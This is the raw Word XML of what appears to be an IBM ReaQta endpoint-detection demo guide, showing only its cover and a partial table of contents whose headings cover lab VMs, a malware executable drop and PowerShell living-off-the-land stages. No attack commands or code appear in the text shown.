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7506B" w14:textId="7EC319E9" w:rsidR="00DD15A0" w:rsidRPr="0077681B" w:rsidRDefault="00DC6502" w:rsidP="0077681B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="0077681B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658239" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A1CBA56" wp14:editId="02F313D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-456826</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-457200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7772400"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2257" w14:textId="56CCAE39" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="0077681B">
                            <w:r>
                              <w:softHyphen/>
                            </w:r>
                            <w:r>
                              <w:softHyphen/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A1781F1" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1"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5.95pt;margin-top:-36pt;width:612pt;height:1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" fillcolor="black [3213]" stroked="f" strokeweight="1pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="031D2257" w14:textId="56CCAE39" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="0077681B">
                      <w:r>
                        <w:softHyphen/>
                      </w:r>
                      <w:r>
                        <w:softHyphen/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A1781F1" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="0077681B"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0018398A" w:rsidRPr="0077681B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>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lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>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rPr>
        <w:softHyphen/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524E54D" w14:textId="6B1A1B88" w:rsidR="00DD15A0" w:rsidRPr="0077681B" w:rsidRDefault="00DD15A0" w:rsidP="0077681B"/>
    <w:p w14:paraId="65B1A685" w14:textId="5BF1A0A8" w:rsidR="00B10F21" w:rsidRPr="0077681B" w:rsidRDefault="00B10F21" w:rsidP="0077681B"/>
    <w:p w14:paraId="2DDB9AD9" w14:textId="77777777" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE">
      <w:pPr>
        <w:jc w:val="cente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3943C2" w14:textId="5C1F0A51" w:rsidR="004C0ABE" w:rsidRPr="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE">
      <w:pPr>
        <w:jc w:val="cente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ReaQta </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="00922E7D">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BOOM</w:t>
      </w:r>
      <w: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Demo</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="00922E7D">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5DDC3FAE" w14:textId="21EAEC6D" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="4C7CE152" w14:textId="074258FE" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="175CCF02" w14:textId="3A4C8B64" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="258C4A87" w14:textId="008CECD3" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="3965FC98" w14:textId="0FF571CC" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="561B4A1E" w14:textId="0E7DB1E7" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="071EA969" w14:textId="77777777" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="6583E9F9" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRPr="001E7CB8" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="10B3E7A7" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="60CA9E40" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRPr="001E7CB8" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A3F8DD" wp14:editId="7BBBA012">
            <wp:extent cx="4298069" cy="239712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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4298950" cy="2397616"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825DA03" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7458E062" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06410938" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BF8140" w14:textId="77777777" w:rsidR="00922E7D" w:rsidRDefault="00922E7D" w:rsidP="00CE033B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Felix Marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B899EF4" w14:textId="294A482C" w:rsidR="004C0ABE" w:rsidRDefault="00F217E1" w:rsidP="00CE033B">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="004C0ABE" w:rsidRPr="00703E4C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>felixmarks@uk.ibm.com</w:t>
        </w:r>
      </w:hyperlink>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59191AE9" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB" w:bidi="he-IL"/>
        </w:rPr>
        <w:id w:val="1288699623"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6717D694" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="101458CC" w14:textId="2D9FCC58" w:rsidR="002809B7" w:rsidRDefault="004C0ABE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc101267842" w:history="1">
            <w:r w:rsidR="002809B7" w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267842 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="002809B7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="779F4048" w14:textId="00E54817" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267843" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Demo Prep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267843 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3371F082" w14:textId="086C8183" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267844" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kali VM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267844 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="352489DD" w14:textId="6648F123" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267845" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows 10 VM without ReaQta Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267845 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55C9A692" w14:textId="103B1C3E" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267846" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows 10 VM with ReaQta Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267846 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34080D3A" w14:textId="3EE2B15F" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267847" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Demo Script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267847 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33F029E9" w14:textId="45E2BE55" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267848" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stage 1 - Boom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267848 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F84A032" w14:textId="523CA625" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267849" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stage 2 - Left of Boom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267849 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E025BC1" w14:textId="6440CE40" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267850" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A Malware Executable Drop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267850 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B86E0CA" w14:textId="2524288D" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267851" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Living off the land with Powershell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc101267851 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="006A91E2" w14:textId="3B71D9DA" w:rsidR="002809B7" w:rsidRDefault="002809B7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc101267852" w:history="1">
            <w:r w:rsidRPr="00137D00">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stage 3 - Right of Boom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
